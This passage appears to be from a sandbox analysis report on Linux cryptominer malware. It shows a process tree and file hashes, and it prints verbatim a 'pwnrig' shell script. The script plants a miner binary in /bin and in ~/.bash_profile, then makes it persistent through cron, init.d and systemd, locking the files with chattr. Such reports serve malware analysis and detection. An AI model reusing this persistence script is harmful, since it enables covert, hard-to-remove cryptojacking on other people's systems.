                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                      PID:3972
                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                      grep -v grep
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:3973
                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                      sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                      • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                      PID:3975
                                                                                                                                                                                                                                                                                                      • /bin/id
                                                                                                                                                                                                                                                                                                        id -u
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                          PID:3976
                                                                                                                                                                                                                                                                                                        • /bin/id
                                                                                                                                                                                                                                                                                                          id -u
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:3977
                                                                                                                                                                                                                                                                                                          • /bin/chattr
                                                                                                                                                                                                                                                                                                            chattr -i -a /bin/bprofr "~/.bash_profile"
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                            PID:3978
                                                                                                                                                                                                                                                                                                          • /bin/rm
                                                                                                                                                                                                                                                                                                            rm -rf /bin/bprofr
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                              PID:3979
                                                                                                                                                                                                                                                                                                            • /bin/sed
                                                                                                                                                                                                                                                                                                              sed -i /bprofr/d "~/.bash_profile"
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                              PID:3980
                                                                                                                                                                                                                                                                                                            • /bin/cp
                                                                                                                                                                                                                                                                                                              cp -f -r -- /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b /bin/bprofr
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • Writes file to system bin folder
                                                                                                                                                                                                                                                                                                              PID:3981
                                                                                                                                                                                                                                                                                                            • /bin/id
                                                                                                                                                                                                                                                                                                              id -u
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:3982
                                                                                                                                                                                                                                                                                                              • /bin/chattr
                                                                                                                                                                                                                                                                                                                chattr +i +a /bin/bprofr "~/.bash_profile"
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                PID:3983
                                                                                                                                                                                                                                                                                                              • /bin/mkdir
                                                                                                                                                                                                                                                                                                                mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:3984
                                                                                                                                                                                                                                                                                                                • /bin/chattr
                                                                                                                                                                                                                                                                                                                  chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                  PID:3985
                                                                                                                                                                                                                                                                                                                • /bin/rm
                                                                                                                                                                                                                                                                                                                  rm -rf /bin/crondr
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:3986
                                                                                                                                                                                                                                                                                                                  • /bin/cp
                                                                                                                                                                                                                                                                                                                    cp -f -r -- /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b /bin/crondr
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                    • Writes file to system bin folder
                                                                                                                                                                                                                                                                                                                    PID:3987
                                                                                                                                                                                                                                                                                                                  • /bin/tee
                                                                                                                                                                                                                                                                                                                    tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                    PID:3989
                                                                                                                                                                                                                                                                                                                  • /bin/sed
                                                                                                                                                                                                                                                                                                                    sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                    • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                    PID:3990
                                                                                                                                                                                                                                                                                                                  • /bin/chmod
                                                                                                                                                                                                                                                                                                                    chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:3991
                                                                                                                                                                                                                                                                                                                    • /bin/chattr
                                                                                                                                                                                                                                                                                                                      chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                      PID:3992
                                                                                                                                                                                                                                                                                                                    • /bin/which
                                                                                                                                                                                                                                                                                                                      which chkconfig
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:3993
                                                                                                                                                                                                                                                                                                                      • /bin/which
                                                                                                                                                                                                                                                                                                                        which update-rc.d
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                          PID:3994
                                                                                                                                                                                                                                                                                                                        • /bin/chattr
                                                                                                                                                                                                                                                                                                                          chattr -i -a /etc/init.d/pwnrig /bin/initdr
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                          PID:3995
                                                                                                                                                                                                                                                                                                                        • /sbin/update-rc.d
                                                                                                                                                                                                                                                                                                                          update-rc.d -f pwnrig disable
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:3996
                                                                                                                                                                                                                                                                                                                            • /bin/systemctl
                                                                                                                                                                                                                                                                                                                              systemctl "--root=/" --quiet disable pwnrig
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                PID:3997
                                                                                                                                                                                                                                                                                                                              • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                  PID:3998
                                                                                                                                                                                                                                                                                                                              • /sbin/update-rc.d
                                                                                                                                                                                                                                                                                                                                update-rc.d -f pwnrig remove
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:4121
                                                                                                                                                                                                                                                                                                                                  • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                    systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                      PID:4122
                                                                                                                                                                                                                                                                                                                                  • /bin/rm
                                                                                                                                                                                                                                                                                                                                    rm -rf /bin/initdr
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:4245
                                                                                                                                                                                                                                                                                                                                    • /bin/cp
                                                                                                                                                                                                                                                                                                                                      cp -f -r -- /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b /bin/initdr
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                      • Writes file to system bin folder
                                                                                                                                                                                                                                                                                                                                      PID:4246
                                                                                                                                                                                                                                                                                                                                    • /bin/tee
                                                                                                                                                                                                                                                                                                                                      tee /etc/init.d/pwnrig
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies init.d
                                                                                                                                                                                                                                                                                                                                      PID:4248
                                                                                                                                                                                                                                                                                                                                    • /bin/sed
                                                                                                                                                                                                                                                                                                                                      sed -i "1 s/-e //" /etc/init.d/pwnrig
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                      • Modifies init.d
                                                                                                                                                                                                                                                                                                                                      PID:4249
                                                                                                                                                                                                                                                                                                                                    • /bin/chmod
                                                                                                                                                                                                                                                                                                                                      chmod +x /etc/init.d/pwnrig /bin/initdr
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                        PID:4250
                                                                                                                                                                                                                                                                                                                                      • /sbin/update-rc.d
                                                                                                                                                                                                                                                                                                                                        update-rc.d pwnrig defaults
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                          PID:4251
                                                                                                                                                                                                                                                                                                                                          • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                            systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                              PID:4252
                                                                                                                                                                                                                                                                                                                                          • /sbin/update-rc.d
                                                                                                                                                                                                                                                                                                                                            update-rc.d pwnrig enable
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                              PID:4375
                                                                                                                                                                                                                                                                                                                                              • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                systemctl "--root=/" --quiet enable pwnrig
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4376
                                                                                                                                                                                                                                                                                                                                                • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                  systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4377
                                                                                                                                                                                                                                                                                                                                                • /bin/chattr
                                                                                                                                                                                                                                                                                                                                                  chattr +i +a /etc/init.d/pwnrig /bin/initdr
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                  PID:4500
                                                                                                                                                                                                                                                                                                                                                • /bin/which
                                                                                                                                                                                                                                                                                                                                                  which systemctl
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4501
                                                                                                                                                                                                                                                                                                                                                  • /bin/chattr
                                                                                                                                                                                                                                                                                                                                                    chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                    • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                    PID:4502
                                                                                                                                                                                                                                                                                                                                                  • /bin/rm
                                                                                                                                                                                                                                                                                                                                                    rm -rf /bin/sysdr
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4503
                                                                                                                                                                                                                                                                                                                                                    • /bin/cp
                                                                                                                                                                                                                                                                                                                                                      cp -f -r -- /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b /bin/sysdr
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                      • Writes file to system bin folder
                                                                                                                                                                                                                                                                                                                                                      PID:4504
                                                                                                                                                                                                                                                                                                                                                    • /bin/tee
                                                                                                                                                                                                                                                                                                                                                      tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                      • Modifies systemd
                                                                                                                                                                                                                                                                                                                                                      PID:4506
                                                                                                                                                                                                                                                                                                                                                    • /bin/sed
                                                                                                                                                                                                                                                                                                                                                      sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                      PID:4507
                                                                                                                                                                                                                                                                                                                                                    • /bin/chattr
                                                                                                                                                                                                                                                                                                                                                      chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                      PID:4508
                                                                                                                                                                                                                                                                                                                                                    • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                      systemctl enable pwnrige.service
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:4509
                                                                                                                                                                                                                                                                                                                                                      • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                        systemctl enable pwnrigl.service
                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4632
                                                                                                                                                                                                                                                                                                                                                        • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                          systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:4758
                                                                                                                                                                                                                                                                                                                                                          • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                            systemctl reload-or-restart pwnrige.service
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:4886
                                                                                                                                                                                                                                                                                                                                                        • /tmp/-python37-89b070bb-bda2-479e-b1ab-1879f1acb90c
                                                                                                                                                                                                                                                                                                                                                          /tmp/-python37-89b070bb-bda2-479e-b1ab-1879f1acb90c
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                          • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                          PID:4943

                                                                                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                                                                                      • /etc/cron.d/dbus-manager

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        177B

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        cb15fc1aeb315b203f6d6c49fc97d754

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        33baee08c1adf776175ed6f94d9c192d4d36949c

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        f33416850da138c66d6054d7a315a0040623326236c1c62d32e94d52aca6f495

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        5dffb2864a87b3004971092255948c30996acfeff3b3980bce0adb8bf593fc79a7f1320dc350d86fee166bb74c47fb23928236db04eded85823dc856ea96f834

                                                                                                                                                                                                                                                                                                                                                      • /etc/cron.d/pwnrig

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        199B

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        906980accf4b594d289d69ab3c2b212c

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        07d5e5111fe11aa1aaa66c61dc4a3df74b3ec6dd

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        2e4d6729014e1722ea4839b574d63c0e17a72a99c7ff2fd73bbb981c3429d92c

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        467b5bffb60506600723b0b416393853d21bfeb19986537a492716a338de4deb2cfe414e62c047798d1ad3b945d1571f1286e6d9627f823f35e7704b0d095fb0

                                                                                                                                                                                                                                                                                                                                                      • /etc/cron.d/sedITQaWG

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        196B

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        85af470e35a1ae54466bb6d33978ad92

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        d3a7f7639a62dd11db91fbcf55922e29b66f1935

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        0940db984b9b439904954693b7d2fd4dd9b295e1cb4c440b203b2e72a3aea0ba

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        a2702d6157fe0f475a04ff10d0860756e1aaa7c9ee0ff05ae51ef13c7d8cb358ddc85011557e37a142ec1803e5a8551dbfc873ffa85437e5e97bfdff89c18145

                                                                                                                                                                                                                                                                                                                                                      • /etc/init.d/dpkg-deb-package

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        366B

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        906d7ce63c7466c6c65f509156bb1529

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        1e3dcb514ce8007a594f6805c7bdde98fe2f7667

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        e3d6f2b6cc53564780785e6efb9e415b83e40342fe7afe210631fe84fd492476

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        f488084c847b471330dbef23bbb7e3c9def2b961a66406d8ae36de9fe168f9ae1c3db3b001f8e58bd2a0dbf91696a8512812a87bb805df71972a76b82e11cd4d

                                                                                                                                                                                                                                                                                                                                                      • /etc/init.d/pwnrig

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        384B

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        15caeb685929dab65b1094f9e5c4b29f

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        2b1141235c528d8ef5aba5ec6567441d04b2634f

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        ac406aa204b2dd2c018a98fdb2090f99821be750dae169f5ca13a080822ac8b0

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        590862dfff0c3537ea515f8caf28a658c5419140819232d396ce2f0063532d6bb8b6c808df775c3185e6f08f868154879c4980c5d14b38fa1fb2eaa3392a1c71

                                                                                                                                                                                                                                                                                                                                                      • /etc/init.d/sed0y3M27

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        381B

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        31fc62b7f5d35aac493ca5162b16f812

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        23aae8aa6388120308c0bdacb66fee7ac8e8641b

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        0e36d48719109e697a24e8fe2f72239109f55071ae9c603f85301029fb09271d

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        69e99a9aaebd79746d04cb022107a4b813e4d9a806ba55e53d6493c9b3a893156a5518117dcf8e7d6cdae3e5598a56feff2b108e5707eea85cafcaddb6b7d776

                                                                                                                                                                                                                                                                                                                                                      • /etc/systemd/system/dpkg-deb-package.service

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        368B

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        c4b8df941d21bfdef588739132cd7a14

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        2ead781a01cc9375ed6c8baab5dfda0cebe1fcfd

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        10d05ae87e80189eead21851fdd757b60d7c7710adce029176847516387cfc5e

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        bd82c37868c18bbf9c4acde45fb4368d0ac87af741797fca71049f763a665c94651db5e18aed249a99e8b1491c04c476ce1c9039bc8583c89bb071293fe9dae3

                                                                                                                                                                                                                                                                                                                                                      • /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        2.3MB

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        b9f096559e923787ebb1288c93ce2902

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        94851bcc8f9c651bcda0ff33d17356cb0b16cf12

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        1fcc2061f767574044ca1e97f92ca1d44ee0b35e0a796e3bd6a949ad4b1175e5

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        ce5f09737d0b7191e3b646ed6111bb0ce97544d280223f327c4f4cc652dc840fed639bc0462b88a7f87d071066e302be7980f14faca1f5e6e9bf732637db22be

                                                                                                                                                                                                                                                                                                                                                      • /tmp/-python37-59bcbe28-2a35-4e11-824b-88ffcec00448

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        184KB

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        8a68585066330f536d6fb376d15cfc4f

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        587dfdb1a3607af9ed32e0561bbab944f510b17b

                                                                                                                                                                                                                                                                                                                                                        SHA256

